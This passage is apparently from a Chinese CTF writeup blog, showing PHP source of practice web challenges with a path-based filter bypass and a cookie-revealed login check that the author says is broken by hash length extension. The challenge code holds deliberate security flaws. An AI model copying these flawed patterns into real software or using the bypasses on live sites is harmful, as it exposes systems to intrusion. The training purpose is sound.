= <span class="string">""</span>; </div><div class="line">    $stop = <span class="number">5</span>;        <span class="comment">//Pass </span></div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="comment">//第六，我们知道在index.php后面加.也是可以的 </span></div><div class="line"><span class="comment">//所以我们禁止p后面出现.这个符号 </span></div><div class="line"><span class="keyword">if</span>($flag &amp;&amp; strpos($URL, <span class="string">'p.'</span>) !== <span class="keyword">FALSE</span>)&#123; </div><div class="line">    $flag = <span class="string">""</span>; </div><div class="line">    $stop = <span class="number">6</span>;        <span class="comment">//Pass </span></div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="comment">//第七，现在是最关键的时刻 </span></div><div class="line"><span class="comment">//你的$URL必须与/indirection/index.php有所不同 </span></div><div class="line"><span class="keyword">if</span>($flag &amp;&amp; $URL == <span class="string">'/indirection/index.php'</span>)&#123; </div><div class="line">    $flag = <span class="string">""</span>; </div><div class="line">    $stop = <span class="number">7</span>;        <span class="comment">//Pass </span></div><div class="line">&#125; </div><div class="line"><span class="keyword">if</span>(!$stop) $stop = <span class="number">8</span>; </div><div class="line"></div><div class="line"><span class="keyword">echo</span> <span class="string">'Flag: '</span>.$flag; </div><div class="line"><span class="keyword">echo</span> <span class="string">'&lt;hr /&gt;'</span>; </div><div class="line"><span class="keyword">for</span>($i = <span class="number">1</span>; $i &lt; $stop; $i++) </div><div class="line">    $code = str_replace(<span class="string">'//Pass '</span>.$i, <span class="string">'//Pass'</span>, $code); </div><div class="line"><span class="keyword">for</span>(; $i &lt; <span class="number">8</span>; $i++) </div><div class="line">    $code = str_replace(<span class="string">'//Pass '</span>.$i, <span class="string">'//Not Pass'</span>, $code); </div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">echo</span> highlight_string($code, <span class="keyword">TRUE</span>); </div><div class="line"></div><div class="line"><span class="keyword">echo</span> <span class="string">'&lt;/body&gt;&lt;/html&gt;'</span>;</div></pre></td></tr></table></figure>
<p>这题在看了之后，我顺手输入了一个index.php 就直接把flag显示了？？不懂什么鬼，而后又查看了别人的writeup，貌似这题考的本意是利用伪静态技术，访问<code>/index.php/index.php</code>来达到绕过的目的</p>
<h2 id="让我进去"><a href="#让我进去" class="headerlink" title="让我进去"></a>让我进去</h2><blockquote>
<p>相信你一定能拿到想要的<br>Hint:你可能希望知道服务器端发生了什么。。<br>格式：CTF{}<br>解题链接： <a href="http://ctf5.shiyanbar.com/web/kzhan.php" target="_blank" rel="external">http://ctf5.shiyanbar.com/web/kzhan.php</a></p>
</blockquote>
<p>尝试提交，发现返回header的cookie中有<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">Set-Cookie: sample-hash=571580b26c65f306376d4f64e53cb5c7;</div><div class="line">Set-Cookie: source=0;</div></pre></td></tr></table></figure></p>
<p>尝试把source的值修改为1，提交 显示了源码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">$flag = <span class="string">"XXXXXXXXXXXXXXXXXXXXXXX"</span>;</div><div class="line">$secret = <span class="string">"XXXXXXXXXXXXXXX"</span>; <span class="comment">// This secret is 15 characters long for security!</span></div><div class="line"></div><div class="line">$username = $_POST[<span class="string">"username"</span>];</div><div class="line">$password = $_POST[<span class="string">"password"</span>];</div><div class="line"></div><div class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>($_COOKIE[<span class="string">"getmein"</span>])) &#123;</div><div class="line">    <span class="keyword">if</span> (urldecode($username) === <span class="string">"admin"</span> &amp;&amp; urldecode($password) != <span class="string">"admin"</span>) &#123;</div><div class="line">        <span class="keyword">if</span> ($COOKIE[<span class="string">"getmein"</span>] === md5($secret . urldecode($username . $password))) &#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">"Congratulations! You are a registered user.\n"</span>;</div><div class="line">            <span class="keyword">die</span> (<span class="string">"The flag is "</span>. $flag);</div><div class="line">        &#125;</div><div class="line">        <span class="keyword">else</span> &#123;</div><div class="line">            <span class="keyword">die</span> (<span class="string">"Your cookies don't match up! STOP HACKING THIS SITE."</span>);</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">else</span> &#123;</div><div class="line">        <span class="keyword">die</span> (<span class="string">"You are not an admin! LEAVE."</span>);</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">setcookie(<span class="string">"sample-hash"</span>, md5($secret . urldecode(<span class="string">"admin"</span> . <span class="string">"admin"</span>)), time() + (<span class="number">60</span> * <span class="number">60</span> * <span class="number">24</span> * <span class="number">7</span>));</div><div class="line"></div><div class="line"><span class="keyword">if</span> (<span class="keyword">empty</span>($_COOKIE[<span class="string">"source"</span>])) &#123;</div><div class="line">    setcookie(<span class="string">"source"</span>, <span class="number">0</span>, time() + (<span class="number">60</span> * <span class="number">60</span> * <span class="number">24</span> * <span class="number">7</span>));</div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span> &#123;</div><div class="line">    <span class="keyword">if</span> ($_COOKIE[<span class="string">"source"</span>] != <span class="number">0</span>) &#123;</div><div class="line">        <span class="keyword">echo</span> <span class="string">""</span>; <span class="comment">// This source code is outputted here</span></div><div class="line">    &#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>尝试了好久绕过<code>!=</code>但是均不成功，后来查看writeup得知是要利用到<a href="http://www.freebuf.com/articles/database/137129.html" target="_blank" rel="external"><strong>hash拓展攻击</strong></a>的知识，不在这展开，后续深入拓展</p>

      
    </div>
    
    
    
    <div>
      
         
      
    </div>

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/writeup/" rel="tag"># writeup</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/10/01/hello-world/" rel="next" title="Hello World">
                <i class="fa fa-chevron-left"></i> Hello World
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/10/05/mooctest-writeup/" rel="prev" title="mooctest-writeup">
                mooctest-writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          
            <img class="site-author-image" itemprop="image"
              src="/uploads/avatar.png"
              alt="iSky0t" />
          
            <p class="site-author-name" itemprop="name">iSky0t</p>
            <p class="site-description motion-element" itemprop="description">网络信息安全爱好者,大学狗</p>
        </div>

        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">1</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/iSky0t" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>GitHub</a>
              </span>
            
              <span class="links-of-author-item">
                <a href="mailto:isky0toor@gmail.com" target="_blank" title="E-Mail">
                  
                    <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#登陆一下好吗"><span class="nav-number">1.</span> <span class="nav-text">登陆一下好吗??</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#who-are-you"><span class="nav-number">2.</span> <span class="nav-text">who are you?</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#不使用逗号"><span class="nav-number">2.1.</span> <span class="nav-text">不使用逗号</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#因缺思汀的绕过"><span class="nav-number">3.</span> <span class="nav-text">因缺思汀的绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#简单的sql注入"><span class="nav-number">4.</span> <span class="nav-text">简单的sql注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#简单的sql注入2"><span class="nav-number">5.</span> <span class="nav-text">简单的sql注入2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#简单的sql注入3"><span class="nav-number">6.</span> <span class="nav-text">简单的sql注入3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#天下武功唯快不破"><span class="nav-number">7.</span> <span class="nav-text">天下武功唯快不破</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#上传绕过"><span class="nav-number">8.</span> <span class="nav-text">上传绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NSCTF-web200"><span class="nav-number">9.</span> <span class="nav-text">NSCTF web200</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP大法"><span class="nav-number">10.</span> <span class="nav-text">PHP大法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#urlencode"><span class="nav-number">10.1.</span> <span class="nav-text">urlencode</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#FALSE"><span class="nav-number">11.</span> <span class="nav-text">FALSE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Forms"><span class="nav-number">12.</span> <span class="nav-text">Forms</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#程序逻辑问题"><span class="nav-number">13.</span> <span class="nav-text">程序逻辑问题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#what-a-fuck-这是什么鬼东西"><span class="nav-number">14.</span> <span class="nav-text">what a fuck!这是什么鬼东西?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#忘记密码了"><span class="nav-number">15.</span> <span class="nav-text">忘记密码了</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Once-More"><span class="nav-number">16.</span> <span class="nav-text">Once More</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#天网管理系统"><span class="nav-number">17.</span> <span class="nav-text">天网管理系统</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#貌似有点难"><span class="nav-number">18.</span> <span class="nav-text">貌似有点难</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#头有点大"><span class="nav-number">19.</span> <span class="nav-text">头有点大</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#猫抓老鼠"><span class="nav-number">20.</span> <span class="nav-text">猫抓老鼠</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#拐弯抹角"><span class="nav-number">21.</span> <span class="nav-text">拐弯抹角</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#让我进去"><span class="nav-number">22.</span> <span class="nav-text">让我进去</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">iSky0t</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.2</div>




        




  <script type="text/javascript">
    (function() {
      var hm = document.createElement("script");
      hm.src = "//tajs.qq.com/stats?sId=63798059";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>


  

  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  








  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("kv5cy3Gfvg24pGeb1xi0W2qq-gzGzoHsz", "tLEuzWC42akUMRw9SgnyPxmt");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  

  

</body>
</html>
